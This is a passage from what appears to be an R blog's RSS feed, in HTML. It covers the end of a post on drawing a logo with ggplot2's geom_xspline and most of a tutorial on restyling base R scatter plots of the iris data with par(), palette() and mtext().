&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 67.9 -332 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 179 -156 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 254 -259 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 36 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The data set contains three columns, &lt;code&gt;x&lt;/code&gt;, &lt;code&gt;y&lt;/code&gt; and &lt;code&gt;type&lt;/code&gt;, where &lt;code&gt;type&lt;/code&gt; indicates the line. Let’s start with a standard &lt;code&gt;geom_line()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(dd, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x, y))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(group &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot1.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;The graph shares similarities with our logo, but is too &lt;em&gt;discrete&lt;/em&gt;. To smooth the curve, we’ll use a function from the {ggalt} package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggalt&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_xspline&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(group &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type), spline_shape &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-0.3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot2.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;The function &lt;code&gt;geom_xspline()&lt;/code&gt; is the X-spline version of &lt;code&gt;geom_line()&lt;/code&gt;, drawing a curve relative to the observations. The parameter&lt;code&gt;spline_shape = -0.3&lt;/code&gt; controls the shape of the spline relative to the observations. This can be a number between &lt;code&gt;-1&lt;/code&gt; &amp;amp; &lt;code&gt;1&lt;/code&gt;. Basically, &lt;code&gt;-1&lt;/code&gt; = bumpy lines, &lt;code&gt;1&lt;/code&gt; = flat lines.&lt;/p&gt;
&lt;p&gt;Next we’ll change the widths of the lines&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(g1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_xspline&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type, group &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type), spline_shape &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-0.3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_size_manual&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, guide &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot3.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;The &lt;code&gt;scale_size_manual()&lt;/code&gt; function enables us to control the line widths. Finally, we remove the background&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_void&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot4.svg" style="width:450px; class:image-center"&gt;
&lt;p&gt;The function &lt;code&gt;theme_void()&lt;/code&gt; does what it says on the tin it gives us a theme completely void of everything. Bar the lines of course.&lt;/p&gt;
&lt;p&gt;That’s all for now. Thanks for reading! :)&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/our-logo-in-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Styling Base R Graphics</title><link>https://www.jumpingrivers.com/blog/styling-base-r-graphics/</link><pubDate>Thu, 25 Jan 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/styling-base-r-graphics/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/styling-base-r-graphics/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/styling-base-r-graphics/original.gif " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/styling-base-r-graphics/#publication-quality-base-r-graphics"&gt;Publication quality base R graphics&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/styling-base-r-graphics/#fixing-the-problem"&gt;Fixing the problem&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/styling-base-r-graphics/#why-not-use-ggplot2-or-something-else"&gt;Why not use {ggplot2} (or something else)?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="publication-quality-base-r-graphics"&gt;Publication quality base R graphics&lt;/h2&gt;
&lt;p&gt;Base R graphics get a bad press (although to be fair, they could have chosen their default values better). In general, they are viewed as a throw back to the dawn of the R era. I think that most people would agree that, in general, there are better graphics techniques in R (e.g. {ggplot2}). However it is occasionally worthwhile making a plot using base R graphics. For example, if you have a publication and you want to make sure the graphics are reproducible in five years.&lt;/p&gt;
&lt;p&gt;In this post we’ll discuss methods for dramatically altering the look and feel of a base R plot. With a bit (ok, a lot) of effort, it is possible to change all aspects of the plot to your liking.&lt;/p&gt;
&lt;p&gt;Typically I detest the &lt;code&gt;iris&lt;/code&gt; the data set. It’s perhaps the most over used dataset in the entire R world. For this &lt;strong&gt;very&lt;/strong&gt; reason, we’ll use it in this post to show what’s possible ;)&lt;/p&gt;
&lt;p&gt;The standard base R scatter plot is&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length, iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Width, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Species)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;legend&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;topright&amp;#34;&lt;/span&gt;, legend &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;levels&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Species), col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, pch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;21&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot1-1.svg" style="width:500px; class:image-center"&gt;
&lt;p&gt;This gives a simple scatter plot with associated legend using the default colour scheme. The list of things wrong with the this plot is fairly lengthy, but not limited to&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Colours&lt;/li&gt;
&lt;li&gt;Margins&lt;/li&gt;
&lt;li&gt;Axis labels&lt;/li&gt;
&lt;li&gt;Overlapping points&lt;/li&gt;
&lt;li&gt;Wasted space&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However with base R graphics we can fix all of these faults!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-styling-base-r-graphics"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="fixing-the-problem"&gt;Fixing the problem&lt;/h2&gt;
&lt;p&gt;What’s not clear in the scatter plot above is that some points lie on top of each other. So the first step is to wiggle the points using the &lt;code&gt;jitter()&lt;/code&gt; function to avoid points sitting on top of each other.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Same as geom_jitter&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;jitter&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;jitter&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Width)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next we select nicer colours (I’ve taken this palette from the great &lt;a href="http://tools.medialab.sciences-po.fr/iwanthue/" rel="external"&gt;I want hue&lt;/a&gt; website). The &lt;code&gt;palette()&lt;/code&gt; function allows you to globally change the colour palette used by base R plots&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;150&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Transparent points&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;palette&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;79&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;178&lt;/span&gt;, alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; alpha, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;105&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;147&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;45&lt;/span&gt;, alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; alpha, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;85&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;130&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;169&lt;/span&gt;, alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; alpha, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next we alter a few plot characteristics with the &lt;code&gt;par()&lt;/code&gt; function&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;par&lt;/span&gt;(mar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# Dist&amp;#39; from plot to side of page&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mgp &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# Dist&amp;#39; plot to label&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; las &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Rotate y-axis text&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tck &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-.01&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Reduce tick length&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xaxs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;i&amp;#34;&lt;/span&gt;, yaxs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;i&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Remove plot padding&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then it comes to the &lt;code&gt;plot()&lt;/code&gt; function itself. This has now become a &lt;strong&gt;lot&lt;/strong&gt; more complicated. We create the plot using the &lt;code&gt;plot()&lt;/code&gt; function, with a number of arguments&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length, iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Width,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Species, &lt;span style="color:#8b949e;font-style:italic"&gt;# Fill colour&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;21&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Shape: circles that can filed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xlab &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal Length&amp;#34;&lt;/span&gt;, ylab &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal Width&amp;#34;&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Labels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Don&amp;#39;t plot the axes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; frame.plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Remove the frame&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xlim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;), ylim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4.5&lt;/span&gt;), &lt;span style="color:#8b949e;font-style:italic"&gt;# Limits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.first &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;abline&lt;/span&gt;(h &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4.5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;), col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey80&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;then add in the x-axis tick marks&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;at &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pretty&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Length)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mtext&lt;/span&gt;(side &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; at, at &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; at,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey20&amp;#34;&lt;/span&gt;, line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, cex &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.9&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and the y-axis&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;at &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pretty&lt;/span&gt;(iris&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Sepal.Width)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mtext&lt;/span&gt;(side &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; at, at &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; at, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey20&amp;#34;&lt;/span&gt;, line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, cex &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.9&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This just leaves the legend. Instead of using the &lt;code&gt;legend()&lt;/code&gt; function, we’ll place the names next to the points via the &lt;code&gt;text()&lt;/code&gt; function&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;text&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4.2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;setosa&amp;#34;&lt;/span&gt;, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;79&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;178&lt;/span&gt;, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;text&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;5.3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2.1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;versicolor&amp;#34;&lt;/span&gt;, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;105&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;147&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;45&lt;/span&gt;, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;))
